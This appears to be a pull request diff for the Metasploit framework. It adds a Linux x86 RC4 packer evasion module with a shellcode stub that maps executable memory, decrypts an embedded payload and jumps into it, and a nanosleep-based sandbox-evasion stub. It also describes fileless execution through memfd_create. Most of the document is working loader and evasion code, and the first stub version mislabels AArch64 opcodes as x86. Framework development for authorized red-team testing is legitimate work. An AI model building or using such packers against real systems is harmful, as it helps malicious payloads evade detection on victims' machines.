### PR TITLE
adding RC4 packer x86, rc4 decrypt routine and sleep evasion routine

### DIFF
--- a/lib/msf/core/payload/linux/x86/rc4_decrypter.rb
+++ b/lib/msf/core/payload/linux/x86/rc4_decrypter.rb
@@ -1,0 +1,183 @@
+module Msf::Payload::Linux::X86::Rc4Decrypter
+
+    STUB_KEY_SIZE_OFFSET = 0x104
+    STUB_PAYLOAD_SIZE_OFFSET = 0x10c
+    STUB_ENCRYPTED_SIZE_OFFSET = 0x114
+    STUB_KEY_DATA_OFFSET = 0x11c
+    STUB_ENCRYPTED_DATA_OFFSET = 0x21c
+  
+    def rc4_decrypter_stub
+      stub = ""
+  
+      # 0x00: adr x10, 0x10c              ; x10 -> payload_size
+      stub << [0x1000086a].pack('V')
+      # 0x04: ldr x1, [x10]               ; x1 = payload_size (mmap length)
+      stub << [0xf9400141].pack('V')
+      # 0x08: mov x0, #0                  ; addr = NULL (let kernel choose)
+      stub << [0xd2800000].pack('V')
+      # 0x0c: mov x2, #7                  ; prot = PROT_READ|PROT_WRITE|PROT_EXEC
+      stub << [0xd28000e2].pack('V')
+      # 0x10: mov x3, #34                 ; flags = MAP_PRIVATE|MAP_ANONYMOUS
+      stub << [0xd2800443].pack('V')
+      # 0x14: mov x4, #-1                 ; fd = -1 (anonymous mapping)
+      stub << [0x92800004].pack('V')
+      # 0x18: mov x5, #0                  ; offset = 0
+      stub << [0xd2800005].pack('V')
+      # 0x1c: mov x8, #222                ; syscall number for mmap (0xDE)
+      stub << [0xd2801bc8].pack('V')
+      # 0x20: svc #0                      ; invoke syscall
+      stub << [0xd4000001].pack('V')
+      # 0x24: mov x20, x0                 ; save mmap'd address in x20
+      stub << [0xaa0003f4].pack('V')
+  
+      # === PART 2: Initialize S-box (256 bytes) on stack ===
+      # 0x28: sub sp, sp, #256            ; allocate 256 bytes for S-box
+      stub << [0xd10403ff].pack('V')
+      # 0x2c: mov x1, sp                  ; x1 = S-box pointer
+      stub << [0x910003e1].pack('V')
+      # 0x30: mov x2, #0                  ; i = 0
+      stub << [0xd2800002].pack('V')
+      # S-box initialization loop: S[i] = i for i = 0..255
+      # 0x34: strb w2, [x1, x2]           ; S[i] = i
+      stub << [0x38226822].pack('V')
+      # 0x38: add x2, x2, #1              ; i++
+      stub << [0x91000442].pack('V')
+      # 0x3c: cmp x2, #256
+      stub << [0xf104005f].pack('V')
+      # 0x40: b.ne 0x34                   ; loop until i == 256
+      stub << [0x54ffffa1].pack('V')
+  
+      # === PART 3: RC4 Key Scheduling Algorithm (KSA) ===
+      # 0x44: adr x0, 0x11c               ; x0 -> key_data
+      stub << [0x100006c0].pack('V')
+      # 0x48: adr x10, 0x104              ; x10 -> key_size
+      stub << [0x100005ea].pack('V')
+      # 0x4c: ldr x1, [x10]               ; x1 = key_size
+      stub << [0xf9400141].pack('V')
+      # 0x50: mov x2, sp                  ; x2 = S-box pointer
+      stub << [0x910003e2].pack('V')
+      # 0x54: mov x3, #0                  ; i = 0
+      stub << [0xd2800003].pack('V')
+      # 0x58: mov x4, #0                  ; j = 0
+      stub << [0xd2800004].pack('V')
+  
+      # KSA loop: for i = 0..255
+      # 0x5c: ldrb w5, [x2, x3]           ; w5 = S[i]
+      stub << [0x38636845].pack('V')
+      # 0x60: add x4, x4, x5              ; j += S[i]
+      stub << [0x8b050084].pack('V')
+      # 0x64: udiv x6, x3, x1             ; x6 = i / key_size
+      stub << [0x9ac10866].pack('V')
+      # 0x68: msub x6, x6, x1, x3         ; x6 = i % key_size (i - (i/key_size)*key_size)
+      stub << [0x9b018cc6].pack('V')
+      # 0x6c: ldrb w7, [x0, x6]           ; w7 = key[i % key_size]
+      stub << [0x38666807].pack('V')
+      # 0x70: add x4, x4, x7              ; j += key[i % key_size]
+      stub << [0x8b070084].pack('V')
+      # 0x74: and x4, x4, #255            ; j &= 0xFF
+      stub << [0x92401c84].pack('V')
+      # 0x78: ldrb w5, [x2, x3]           ; w5 = S[i] (reload for swap)
+      stub << [0x38636845].pack('V')
+      # 0x7c: ldrb w6, [x2, x4]           ; w6 = S[j]
+      stub << [0x38646846].pack('V')
+      # 0x80: strb w6, [x2, x3]           ; S[i] = S[j]
+      stub << [0x38236846].pack('V')
+      # 0x84: strb w5, [x2, x4]           ; S[j] = S[i]
+      stub << [0x38246845].pack('V')
+      # 0x88: add x3, x3, #1              ; i++
+      stub << [0x91000463].pack('V')
+      # 0x8c: cmp x3, #256
+      stub << [0xf104007f].pack('V')
+      # 0x90: b.ne 0x5c                   ; loop until i == 256
+      stub << [0x54fffe61].pack('V')
+  
+      # === PART 4: RC4 Pseudo-Random Generation Algorithm (PRGA) ===
+      # 0x94: adr x0, 0x21c               ; x0 -> encrypted_data
+      stub << [0x10000c40].pack('V')
+      # 0x98: mov x1, x20                 ; x1 = output buffer (mmap'd address)
+      stub << [0xaa1403e1].pack('V')
+      # 0x9c: adr x10, 0x114              ; x10 -> encrypted_size
+      stub << [0x100003ca].pack('V')
+      # 0xa0: ldr x2, [x10]               ; x2 = encrypted_size (loop count)
+      stub << [0xf9400142].pack('V')
+      # 0xa4: mov x3, sp                  ; x3 = S-box pointer
+      stub << [0x910003e3].pack('V')
+      # 0xa8: mov x4, #0                  ; i = 0
+      stub << [0xd2800004].pack('V')
+      # 0xac: mov x5, #0                  ; j = 0
+      stub << [0xd2800005].pack('V')
+      # 0xb0: mov x6, #0                  ; k = 0 (byte counter)
+      stub << [0xd2800006].pack('V')
+  
+      # PRGA loop: for k = 0..encrypted_size-1
+      # 0xb4: add x4, x4, #1              ; i = (i + 1)
+      stub << [0x91000484].pack('V')
+      # 0xb8: and x4, x4, #255            ; i &= 0xFF
+      stub << [0x92401c84].pack('V')
+      # 0xbc: ldrb w7, [x3, x4]           ; w7 = S[i]
+      stub << [0x38646867].pack('V')
+      # 0xc0: add x5, x5, x7              ; j += S[i]
+      stub << [0x8b0700a5].pack('V')
+      # 0xc4: and x5, x5, #255            ; j &= 0xFF
+      stub << [0x92401ca5].pack('V')
+      # 0xc8: ldrb w8, [x3, x5]           ; w8 = S[j]
+      stub << [0x38656868].pack('V')
+      # 0xcc: strb w8, [x3, x4]           ; S[i] = S[j]
+      stub << [0x38246868].pack('V')
+      # 0xd0: strb w7, [x3, x5]           ; S[j] = S[i]
+      stub << [0x38256867].pack('V')
+      # 0xd4: add x9, x7, x8              ; x9 = S[i] + S[j]
+      stub << [0x8b0800e9].pack('V')
+      # 0xd8: and x9, x9, #255            ; x9 &= 0xFF
+      stub << [0x92401d29].pack('V')
+      # 0xdc: ldrb w10, [x3, x9]          ; w10 = S[(S[i]+S[j]) & 0xFF] = keystream byte
+      stub << [0x3869686a].pack('V')
+      # 0xe0: ldrb w11, [x0, x6]          ; w11 = encrypted_data[k]
+      stub << [0x3866680b].pack('V')
+      # 0xe4: eor w10, w10, w11           ; w10 = keystream XOR encrypted = decrypted
+      stub << [0x4a0b014a].pack('V')
+      # 0xe8: strb w10, [x1, x6]          ; output[k] = decrypted byte
+      stub << [0x3826682a].pack('V')
+      # 0xec: add x6, x6, #1              ; k++
+      stub << [0x910004c6].pack('V')
+      # 0xf0: cmp x6, x2                  ; compare k with encrypted_size
+      stub << [0xeb0200df].pack('V')
+      # 0xf4: b.ne 0xb4                   ; loop until k == encrypted_size
+      stub << [0x54fffe01].pack('V')
+      # 0xf8: add sp, sp, #256            ; restore stack (deallocate S-box)
+      stub << [0x910403ff].pack('V')
+      # 0xfc: mov x0, x20                 ; x0 = decrypted payload address
+      stub << [0xaa1403e0].pack('V')
+      # 0x100: br x0                      ; jump to decrypted payload!
+      stub << [0xd61f0000].pack('V')
+  
+      stub << ("\x00" * (STUB_ENCRYPTED_DATA_OFFSET - 260))
+  
+      stub
+    end
+  
+    def rc4_decrypter(opts = {})
+      
+      key = opts[:key] || Rex::Text.rand_text(16)
+      payload = opts[:data] || raise(ArgumentError, "Encrypted data required")
+  
+      encrypted_data = Rex::Crypto::Rc4.rc4(key, payload)
+      payload_size = encrypted_data.length
+  
+      stub = rc4_decrypter_stub.dup
+  
+      stub[STUB_KEY_SIZE_OFFSET, 8] = [key.length].pack('Q<')
+      stub[STUB_PAYLOAD_SIZE_OFFSET, 8] = [payload.length].pack('Q<')
+      stub[STUB_ENCRYPTED_SIZE_OFFSET, 8] = [encrypted_data.length].pack('Q<')
+  
+      stub[STUB_KEY_DATA_OFFSET, 256] = key.ljust(256, "\x00")
+  
+      stub + encrypted_data
+    end
+  
+    def stub_size
+      STUB_ENCRYPTED_DATA_OFFSET
+    end
+  
+  end
+  

--- a/lib/msf/core/payload/linux/x86/rc4_decrypter.rb
+++ b/lib/msf/core/payload/linux/x86/rc4_decrypter.rb
@@ -1,183 +1,148 @@
 module Msf::Payload::Linux::X86::Rc4Decrypter
 
-    STUB_KEY_SIZE_OFFSET = 0x104
-    STUB_PAYLOAD_SIZE_OFFSET = 0x10c
-    STUB_ENCRYPTED_SIZE_OFFSET = 0x114
-    STUB_KEY_DATA_OFFSET = 0x11c
-    STUB_ENCRYPTED_DATA_OFFSET = 0x21c
-  
-    def rc4_decrypter_stub
-      stub = ""
-  
-      # 0x00: adr x10, 0x10c              ; x10 -> payload_size
-      stub << [0x1000086a].pack('V')
-      # 0x04: ldr x1, [x10]               ; x1 = payload_size (mmap length)
-      stub << [0xf9400141].pack('V')
-      # 0x08: mov x0, #0                  ; addr = NULL (let kernel choose)
-      stub << [0xd2800000].pack('V')
-      # 0x0c: mov x2, #7                  ; prot = PROT_READ|PROT_WRITE|PROT_EXEC
-      stub << [0xd28000e2].pack('V')
-      # 0x10: mov x3, #34                 ; flags = MAP_PRIVATE|MAP_ANONYMOUS
-      stub << [0xd2800443].pack('V')
-      # 0x14: mov x4, #-1                 ; fd = -1 (anonymous mapping)
-      stub << [0x92800004].pack('V')
-      # 0x18: mov x5, #0                  ; offset = 0
-      stub << [0xd2800005].pack('V')
-      # 0x1c: mov x8, #222                ; syscall number for mmap (0xDE)
-      stub << [0xd2801bc8].pack('V')
-      # 0x20: svc #0                      ; invoke syscall
-      stub << [0xd4000001].pack('V')
-      # 0x24: mov x20, x0                 ; save mmap'd address in x20
-      stub << [0xaa0003f4].pack('V')
-  
-      # === PART 2: Initialize S-box (256 bytes) on stack ===
-      # 0x28: sub sp, sp, #256            ; allocate 256 bytes for S-box
-      stub << [0xd10403ff].pack('V')
-      # 0x2c: mov x1, sp                  ; x1 = S-box pointer
-      stub << [0x910003e1].pack('V')
-      # 0x30: mov x2, #0                  ; i = 0
-      stub << [0xd2800002].pack('V')
-      # S-box initialization loop: S[i] = i for i = 0..255
-      # 0x34: strb w2, [x1, x2]           ; S[i] = i
-      stub << [0x38226822].pack('V')
-      # 0x38: add x2, x2, #1              ; i++
-      stub << [0x91000442].pack('V')
-      # 0x3c: cmp x2, #256
-      stub << [0xf104005f].pack('V')
-      # 0x40: b.ne 0x34                   ; loop until i == 256
-      stub << [0x54ffffa1].pack('V')
-  
-      # === PART 3: RC4 Key Scheduling Algorithm (KSA) ===
-      # 0x44: adr x0, 0x11c               ; x0 -> key_data
-      stub << [0x100006c0].pack('V')
-      # 0x48: adr x10, 0x104              ; x10 -> key_size
-      stub << [0x100005ea].pack('V')
-      # 0x4c: ldr x1, [x10]               ; x1 = key_size
-      stub << [0xf9400141].pack('V')
-      # 0x50: mov x2, sp                  ; x2 = S-box pointer
-      stub << [0x910003e2].pack('V')
-      # 0x54: mov x3, #0                  ; i = 0
-      stub << [0xd2800003].pack('V')
-      # 0x58: mov x4, #0                  ; j = 0
-      stub << [0xd2800004].pack('V')
-  
-      # KSA loop: for i = 0..255
-      # 0x5c: ldrb w5, [x2, x3]           ; w5 = S[i]
-      stub << [0x38636845].pack('V')
-      # 0x60: add x4, x4, x5              ; j += S[i]
-      stub << [0x8b050084].pack('V')
-      # 0x64: udiv x6, x3, x1             ; x6 = i / key_size
-      stub << [0x9ac10866].pack('V')
-      # 0x68: msub x6, x6, x1, x3         ; x6 = i % key_size (i - (i/key_size)*key_size)
-      stub << [0x9b018cc6].pack('V')
-      # 0x6c: ldrb w7, [x0, x6]           ; w7 = key[i % key_size]
-      stub << [0x38666807].pack('V')
-      # 0x70: add x4, x4, x7              ; j += key[i % key_size]
-      stub << [0x8b070084].pack('V')
-      # 0x74: and x4, x4, #255            ; j &= 0xFF
-      stub << [0x92401c84].pack('V')
-      # 0x78: ldrb w5, [x2, x3]           ; w5 = S[i] (reload for swap)
-      stub << [0x38636845].pack('V')
-      # 0x7c: ldrb w6, [x2, x4]           ; w6 = S[j]
-      stub << [0x38646846].pack('V')
-      # 0x80: strb w6, [x2, x3]           ; S[i] = S[j]
-      stub << [0x38236846].pack('V')
-      # 0x84: strb w5, [x2, x4]           ; S[j] = S[i]
-      stub << [0x38246845].pack('V')
-      # 0x88: add x3, x3, #1              ; i++
-      stub << [0x91000463].pack('V')
-      # 0x8c: cmp x3, #256
-      stub << [0xf104007f].pack('V')
-      # 0x90: b.ne 0x5c                   ; loop until i == 256
-      stub << [0x54fffe61].pack('V')
-  
-      # === PART 4: RC4 Pseudo-Random Generation Algorithm (PRGA) ===
-      # 0x94: adr x0, 0x21c               ; x0 -> encrypted_data
-      stub << [0x10000c40].pack('V')
-      # 0x98: mov x1, x20                 ; x1 = output buffer (mmap'd address)
-      stub << [0xaa1403e1].pack('V')
-      # 0x9c: adr x10, 0x114              ; x10 -> encrypted_size
-      stub << [0x100003ca].pack('V')
-      # 0xa0: ldr x2, [x10]               ; x2 = encrypted_size (loop count)
-      stub << [0xf9400142].pack('V')
-      # 0xa4: mov x3, sp                  ; x3 = S-box pointer
-      stub << [0x910003e3].pack('V')
-      # 0xa8: mov x4, #0                  ; i = 0
-      stub << [0xd2800004].pack('V')
-      # 0xac: mov x5, #0                  ; j = 0
-      stub << [0xd2800005].pack('V')
-      # 0xb0: mov x6, #0                  ; k = 0 (byte counter)
-      stub << [0xd2800006].pack('V')
-  
-      # PRGA loop: for k = 0..encrypted_size-1
-      # 0xb4: add x4, x4, #1              ; i = (i + 1)
-      stub << [0x91000484].pack('V')
-      # 0xb8: and x4, x4, #255            ; i &= 0xFF
-      stub << [0x92401c84].pack('V')
-      # 0xbc: ldrb w7, [x3, x4]           ; w7 = S[i]
-      stub << [0x38646867].pack('V')
-      # 0xc0: add x5, x5, x7              ; j += S[i]
-      stub << [0x8b0700a5].pack('V')
-      # 0xc4: and x5, x5, #255            ; j &= 0xFF
-      stub << [0x92401ca5].pack('V')
-      # 0xc8: ldrb w8, [x3, x5]           ; w8 = S[j]
-      stub << [0x38656868].pack('V')
-      # 0xcc: strb w8, [x3, x4]           ; S[i] = S[j]
-      stub << [0x38246868].pack('V')
-      # 0xd0: strb w7, [x3, x5]           ; S[j] = S[i]
-      stub << [0x38256867].pack('V')
-      # 0xd4: add x9, x7, x8              ; x9 = S[i] + S[j]
-      stub << [0x8b0800e9].pack('V')
-      # 0xd8: and x9, x9, #255            ; x9 &= 0xFF
-      stub << [0x92401d29].pack('V')
-      # 0xdc: ldrb w10, [x3, x9]          ; w10 = S[(S[i]+S[j]) & 0xFF] = keystream byte
-      stub << [0x3869686a].pack('V')
-      # 0xe0: ldrb w11, [x0, x6]          ; w11 = encrypted_data[k]
-      stub << [0x3866680b].pack('V')
-      # 0xe4: eor w10, w10, w11           ; w10 = keystream XOR encrypted = decrypted
-      stub << [0x4a0b014a].pack('V')
-      # 0xe8: strb w10, [x1, x6]          ; output[k] = decrypted byte
-      stub << [0x3826682a].pack('V')
-      # 0xec: add x6, x6, #1              ; k++
-      stub << [0x910004c6].pack('V')
-      # 0xf0: cmp x6, x2                  ; compare k with encrypted_size
-      stub << [0xeb0200df].pack('V')
-      # 0xf4: b.ne 0xb4                   ; loop until k == encrypted_size
-      stub << [0x54fffe01].pack('V')
-      # 0xf8: add sp, sp, #256            ; restore stack (deallocate S-box)
-      stub << [0x910403ff].pack('V')
-      # 0xfc: mov x0, x20                 ; x0 = decrypted payload address
-      stub << [0xaa1403e0].pack('V')
-      # 0x100: br x0                      ; jump to decrypted payload!
-      stub << [0xd61f0000].pack('V')
-  
-      stub << ("\x00" * (STUB_ENCRYPTED_DATA_OFFSET - 260))
-  
-      stub
-    end
-  
-    def rc4_decrypter(opts = {})
-      
-      key = opts[:key] || Rex::Text.rand_text(16)
-      payload = opts[:data] || raise(ArgumentError, "Encrypted data required")
-  
-      encrypted_data = Rex::Crypto::Rc4.rc4(key, payload)
-      payload_size = encrypted_data.length
-  
-      stub = rc4_decrypter_stub.dup
-  
-      stub[STUB_KEY_SIZE_OFFSET, 8] = [key.length].pack('Q<')
-      stub[STUB_PAYLOAD_SIZE_OFFSET, 8] = [payload.length].pack('Q<')
-      stub[STUB_ENCRYPTED_SIZE_OFFSET, 8] = [encrypted_data.length].pack('Q<')
-  
-      stub[STUB_KEY_DATA_OFFSET, 256] = key.ljust(256, "\x00")
-  
-      stub + encrypted_data
-    end
-  
-    def stub_size
-      STUB_ENCRYPTED_DATA_OFFSET
-    end
-  
+  def rc4_decrypter_stub
+    asm = <<-ASM
+_start:
+      jmp _get_data_addr
+
+_got_data_addr:
+      pop ebp
+
+      ; mmap(NULL, payload_size, PROT_RWX, MAP_PRIVATE|MAP_ANON, -1, 0)
+      xor eax, eax
+      push eax
+      push 0xffffffff
+      push 0x22
+      push 7
+      mov eax, dword [ebp+4]
+      push eax
+      xor eax, eax
+      push eax
+      mov al, 0x5a
+      mov ebx, esp
+      int 0x80
+      add esp, 24
+      push eax
+
+      ; Allocate S-box (256 bytes) on stack
+      sub esp, 256
+      mov edi, esp
+
+      ; Initialize S-box: S[i] = i for i = 0..255
+      xor ecx, ecx
+_init_sbox:
+      mov byte [edi+ecx], cl
+      inc cl
+      jnz _init_sbox
+
+      ; RC4 Key Scheduling Algorithm (KSA)
+      xor esi, esi
+      xor ebx, ebx
+
+_ksa_loop:
+
+      movzx eax, byte [edi+esi]
+      add ebx, eax
+
+      mov eax, esi
+      xor edx, edx
+      push ebx
+      mov ecx, dword [ebp]
+      div ecx
+      pop ebx
+      lea ecx, [ebp+12]
+      movzx eax, byte [ecx+edx]
+      add ebx, eax
+      and ebx, 0xff
+
+      movzx eax, byte [edi+esi]
+      movzx ecx, byte [edi+ebx]
+      mov byte [edi+esi], cl
+      mov byte [edi+ebx], al
+
+      inc esi
+      cmp esi, 256
+      jb _ksa_loop
+
+      ;RC4 Pseudo-Random Generation Algorithm (PRGA)
+      xor esi, esi                    
+      xor ebx, ebx                    
+      xor ecx, ecx
+
+_prga_loop:
+
+      inc esi
+      and esi, 0xff
+
+      movzx eax, byte [edi+esi]
+      add ebx, eax
+      and ebx, 0xff
+
+      movzx eax, byte [edi+esi]
+      movzx edx, byte [edi+ebx]
+      mov byte [edi+esi], dl
+      mov byte [edi+ebx], al
+
+      add eax, edx
+      and eax, 0xff
+      movzx eax, byte [edi+eax]
+
+      push ebx
+      lea edx, [ebp+268]
+      xor al, byte [edx+ecx]
+      mov edx, dword [esp+260]
+      mov byte [edx+ecx], al
+      pop ebx
+
+      inc ecx
+      cmp ecx, dword [ebp+8]
+      jb _prga_loop
+
+      add esp, 256                    ; deallocate S-box
+      pop eax                         ; eax = output buffer address
+      jmp eax                         ; jump to decrypted payload
+
+_get_data_addr:
+      call _got_data_addr
+
+; Data section layout (populated by rc4_decrypter):
+; offset +0:   key_size (4 bytes)
+; offset +4:   payload_size (4 bytes)
+; offset +8:   encrypted_size (4 bytes)
+; offset +12:  key_data (256 bytes)
+; offset +268: encrypted_data (variable length)
+    ASM
+
+    Metasm::Shellcode.assemble(Metasm::X86.new, asm).encode_string
   end
-  
+
+  def rc4_decrypter(opts = {})
+    key = opts[:key] || Rex::Text.rand_text(16)
+    payload = opts[:data] || raise(ArgumentError, "Encrypted data required")
+
+    encrypted_data = Rex::Crypto::Rc4.rc4(key, payload)
+
+    stub = rc4_decrypter_stub.dup
+    code_size = stub.length
+
+    key_size_offset = code_size
+    payload_size_offset = code_size + 4
+    encrypted_size_offset = code_size + 8
+    key_data_offset = code_size + 12
+    encrypted_data_offset = code_size + 268
+
+    stub << "\x00" * 268
+
+    stub[key_size_offset, 4] = [key.length].pack('V')
+    stub[payload_size_offset, 4] = [payload.length].pack('V')
+    stub[encrypted_size_offset, 4] = [encrypted_data.length].pack('V')
+    stub[key_data_offset, 256] = key.ljust(256, "\x00")
+
+    stub + encrypted_data
+  end
+
+  def stub_size
+    rc4_decrypter_stub.length + 268
+  end
+
+end

--- a/lib/msf/core/payload/linux/x86/rc4_decrypter.rb
+++ b/lib/msf/core/payload/linux/x86/rc4_decrypter.rb
@@ -1,6 +1,6 @@
 module Msf::Payload::Linux::X86::Rc4Decrypter
 
-  def rc4_decrypter_stub
+  def rc4_decrypter_stub(key_size: 0, payload_size: 0, encrypted_size: 0)
     asm = <<-ASM
 _start:
       jmp _get_data_addr
@@ -14,8 +14,7 @@ _got_data_addr:
       push 0xffffffff
       push 0x22
       push 7
-      mov eax, dword [ebp+4]
-      push eax
+      push #{payload_size}
       xor eax, eax
       push eax
       mov al, 0x5a
@@ -40,18 +39,16 @@ _init_sbox:
       xor ebx, ebx
 
 _ksa_loop:
-
       movzx eax, byte [edi+esi]
       add ebx, eax
 
       mov eax, esi
       xor edx, edx
       push ebx
-      mov ecx, dword [ebp]
+      mov ecx, #{key_size}
       div ecx
       pop ebx
-      lea ecx, [ebp+12]
-      movzx eax, byte [ecx+edx]
+      movzx eax, byte [ebp+edx]
       add ebx, eax
       and ebx, 0xff
 
@@ -64,13 +61,12 @@ _ksa_loop:
       cmp esi, 256
       jb _ksa_loop
 
-      ;RC4 Pseudo-Random Generation Algorithm (PRGA)
-      xor esi, esi                    
-      xor ebx, ebx                    
+      ; RC4 Pseudo-Random Generation Algorithm (PRGA)
+      xor esi, esi
+      xor ebx, ebx
       xor ecx, ecx
 
 _prga_loop:
-
       inc esi
       and esi, 0xff
 
@@ -88,14 +84,14 @@ _prga_loop:
       movzx eax, byte [edi+eax]
 
       push ebx
-      lea edx, [ebp+268]
+      lea edx, [ebp+256]
       xor al, byte [edx+ecx]
       mov edx, dword [esp+260]
       mov byte [edx+ecx], al
       pop ebx
 
       inc ecx
-      cmp ecx, dword [ebp+8]
+      cmp ecx, #{encrypted_size}
       jb _prga_loop
 
       add esp, 256                    ; deallocate S-box
@@ -105,44 +101,29 @@ _prga_loop:
 _get_data_addr:
       call _got_data_addr
 
-; Data section layout (populated by rc4_decrypter):
-; offset +0:   key_size (4 bytes)
-; offset +4:   payload_size (4 bytes)
-; offset +8:   encrypted_size (4 bytes)
-; offset +12:  key_data (256 bytes)
-; offset +268: encrypted_data (variable length)
+; Data section layout:
+; offset +0:   key_data (256 bytes)
+; offset +256: encrypted_data (variable length)
     ASM
 
     Metasm::Shellcode.assemble(Metasm::X86.new, asm).encode_string
   end
 
   def rc4_decrypter(opts = {})
-    key = opts[:key] || Rex::Text.rand_text(16)
-    payload = opts[:data] || raise(ArgumentError, "Encrypted data required")
+    key            = opts[:key] || Rex::Text.rand_text(16)
+    payload        = opts[:data] || raise(ArgumentError, "Encrypted data required")
+    raise(ArgumentError, "Key must be <= 256 bytes") if key.length > 256
 
     encrypted_data = Rex::Crypto::Rc4.rc4(key, payload)
 
-    stub = rc4_decrypter_stub.dup
-    code_size = stub.length
+    stub = rc4_decrypter_stub(
+      key_size:       key.length,
+      payload_size:   payload.length,
+      encrypted_size: encrypted_data.length
+    )
 
-    key_size_offset = code_size
-    payload_size_offset = code_size + 4
-    encrypted_size_offset = code_size + 8
-    key_data_offset = code_size + 12
-    encrypted_data_offset = code_size + 268
-
-    stub << "\x00" * 268
-
-    stub[key_size_offset, 4] = [key.length].pack('V')
-    stub[payload_size_offset, 4] = [payload.length].pack('V')
-    stub[encrypted_size_offset, 4] = [encrypted_data.length].pack('V')
-    stub[key_data_offset, 256] = key.ljust(256, "\x00")
-
-    stub + encrypted_data
-  end
-
-  def stub_size
-    rc4_decrypter_stub.length + 268
+    stub << key.ljust(256, "\x00")
+    stub << encrypted_data
   end
 
 end

--- a/lib/msf/core/payload/linux/x86/sleep_evasion.rb
+++ b/lib/msf/core/payload/linux/x86/sleep_evasion.rb
@@ -1,0 +1,46 @@
+module Msf::Payload::Linux::X86::SleepEvasion
+
+    STUB_SLEEP_SECONDS_OFFSET = 0x02
+
+    def sleep_stub
+      stub = ""
+
+      # 0x00: jmp 0x12                   ; jump forward to code (skip data section)
+      stub << [0xeb, 0x10].pack('C*')
+      # 0x02: timespec.tv_sec (4 bytes)  ; sleep duration in seconds (patched later)
+      stub << "\x00\x00\x00\x00"
+      # 0x06: timespec.tv_nsec (4 bytes) ; nanoseconds component (always 0)
+      stub << "\x00\x00\x00\x00"
+      # 0x0a: reserved (8 bytes)         ; alignment padding
+      stub << "\x00\x00\x00\x00\x00\x00\x00\x00"
+      # 0x12: call 0x17                  ; push next instruction address to stack
+      stub << [0xe8, 0x00, 0x00, 0x00, 0x00].pack('C*')
+      # 0x17: pop ebx                    ; ebx = current EIP
+      stub << [0x5b].pack('C*')
+      # 0x18: sub ebx, 0x15              ; ebx -> timespec structure (ebx - 21 bytes)
+      stub << [0x83, 0xeb, 0x15].pack('C*')
+      # 0x1b: xor ecx, ecx               ; ecx = NULL (remaining time pointer)
+      stub << [0x31, 0xc9].pack('C*')
+      # 0x1d: mov eax, 162               ; syscall number for nanosleep (0xa2)
+      stub << [0xb8, 0xa2, 0x00, 0x00, 0x00].pack('C*')
+      # 0x22: int 0x80                   ; invoke syscall
+      stub << [0xcd, 0x80].pack('C*')
+      # 0x24: execution continues to appended payload
+
+      stub
+    end
+
+    def sleep_evasion(opts = {})
+      seconds = opts[:seconds] || 0
+      return "" if seconds == 0
+
+      stub = sleep_stub.dup
+      stub[STUB_SLEEP_SECONDS_OFFSET, 4] = [seconds].pack('V')
+      stub
+    end
+
+    def sleep_stub_size
+      36
+    end
+
+end

--- a/lib/msf/core/payload/linux/x86/sleep_evasion.rb
+++ b/lib/msf/core/payload/linux/x86/sleep_evasion.rb
@@ -1,46 +1,20 @@
 module Msf::Payload::Linux::X86::SleepEvasion
 
-    STUB_SLEEP_SECONDS_OFFSET = 0x02
+  def sleep_evasion(opts = {})
+    seconds = opts[:seconds] || rand(60)
+    asm = <<-ASM
+      ; nanosleep(&timespec, NULL)
+      push 0              ; timespec.tv_nsec = 0
+      push #{seconds}     ; timespec.tv_sec = <seconds>
+      mov ebx, esp        ; ebx -> timespec on stack
+      xor ecx, ecx        ; ecx = NULL (remaining time pointer)
+      mov eax, 162        ; syscall number for nanosleep (0xa2)
+      int 0x80            ; invoke syscall
+      add esp, 8          ; restore stack
+      ; execution continues to appended payload
+    ASM
 
-    def sleep_stub
-      stub = ""
-
-      # 0x00: jmp 0x12                   ; jump forward to code (skip data section)
-      stub << [0xeb, 0x10].pack('C*')
-      # 0x02: timespec.tv_sec (4 bytes)  ; sleep duration in seconds (patched later)
-      stub << "\x00\x00\x00\x00"
-      # 0x06: timespec.tv_nsec (4 bytes) ; nanoseconds component (always 0)
-      stub << "\x00\x00\x00\x00"
-      # 0x0a: reserved (8 bytes)         ; alignment padding
-      stub << "\x00\x00\x00\x00\x00\x00\x00\x00"
-      # 0x12: call 0x17                  ; push next instruction address to stack
-      stub << [0xe8, 0x00, 0x00, 0x00, 0x00].pack('C*')
-      # 0x17: pop ebx                    ; ebx = current EIP
-      stub << [0x5b].pack('C*')
-      # 0x18: sub ebx, 0x15              ; ebx -> timespec structure (ebx - 21 bytes)
-      stub << [0x83, 0xeb, 0x15].pack('C*')
-      # 0x1b: xor ecx, ecx               ; ecx = NULL (remaining time pointer)
-      stub << [0x31, 0xc9].pack('C*')
-      # 0x1d: mov eax, 162               ; syscall number for nanosleep (0xa2)
-      stub << [0xb8, 0xa2, 0x00, 0x00, 0x00].pack('C*')
-      # 0x22: int 0x80                   ; invoke syscall
-      stub << [0xcd, 0x80].pack('C*')
-      # 0x24: execution continues to appended payload
-
-      stub
-    end
-
-    def sleep_evasion(opts = {})
-      seconds = opts[:seconds] || 0
-      return "" if seconds == 0
-
-      stub = sleep_stub.dup
-      stub[STUB_SLEEP_SECONDS_OFFSET, 4] = [seconds].pack('V')
-      stub
-    end
-
-    def sleep_stub_size
-      36
-    end
+    Metasm::Shellcode.assemble(Metasm::X86.new, asm).encode_string
+  end
 
 end

--- a/modules/evasion/linux/x86/rc4_packer.rb
+++ b/modules/evasion/linux/x86/rc4_packer.rb
@@ -18,7 +18,7 @@ class MetasploitModule < Msf::Evasion
           This evasion module packs Linux payloads using RC4 encryption
           and executes them from memory using memfd_create for fileless execution.
 
-          The evasion module works on systems with Linux Kernel > 3.17 due to memfd_create support.
+          The evasion module works on systems with Linux Kernel 3.17+ due to memfd_create support.
 
           Features:
           - RC4 encryption with configurable key size

--- a/modules/evasion/linux/x86/rc4_packer.rb
+++ b/modules/evasion/linux/x86/rc4_packer.rb
@@ -13,23 +13,23 @@ class MetasploitModule < Msf::Evasion
     super(
       update_info(
         info,
-        'Name'           => 'Linux RC4 Packer with In-Memory Execution (x86)',
-        'Description'    => %q{
+        'Name' => 'Linux RC4 Packer with In-Memory Execution (x86)',
+        'Description' => %q{
           This evasion module packs Linux payloads using RC4 encryption
           and executes them from memory using memfd_create for fileless execution.
-          
+
           The evasion module works on systems with Linux Kernel > 3.17 due to memfd_create support.
-          
+
           Features:
           - RC4 encryption with configurable key size
           - Fileless execution via memfd_create
         },
-        'Author'         => ['Massimo Bertocchi'],
-        'License'        => MSF_LICENSE,
-        'Platform'       => 'linux',
-        'Arch'           => [ARCH_X86],
-        'Targets'        => [['Linux x86', {}]],
-        'DefaultTarget'  => 0
+        'Author' => ['Massimo Bertocchi'],
+        'License' => MSF_LICENSE,
